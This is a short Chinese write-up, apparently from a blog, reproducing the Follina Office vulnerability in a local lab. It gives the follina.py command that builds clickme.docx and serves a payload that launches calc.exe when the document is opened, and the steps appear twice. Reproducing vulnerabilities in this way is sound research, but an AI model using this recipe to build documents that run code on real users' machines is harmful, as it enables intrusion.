漏洞复现
本地测试环境:
Windows 10
Microsoft Office 2019
项目地址:
https://github.com/chvancooten/follina.py
运行验证脚本:
运行POC同时启动 Web 服务器:
python3 follina.py -m binary -b \windows\system32\calc.exe -H 0.0.0.0 -P 8080
脚本将生成 clickme.docx的文件
打开clickme.docx时受影响的目标主机将弹出计算器。
成功弹出计算器。
本地测试环境:
Windows 10
Microsoft Office 2019
项目地址:
https://github.com/chvancooten/follina.py
运行验证脚本:
运行POC同时启动 Web 服务器:
python3 follina.py -m binary -b \windows\system32\calc.exe -H 0.0.0.0 -P 8080
脚本将生成 clickme.docx的文件
打开clickme.docx时受影响的目标主机将弹出计算器。
成功弹出计算器。
© 版权声明
本站所有内容(包括但不限于文字、图片、视频等)均受到版权法保护,归作者所有,未经授权不得转载、复制或用于其他任何商业目的。 转载请注明出处,并保留原文链接。对于未经授权的使用,我们将保留追究法律责任的权利。
THE END
暂无评论内容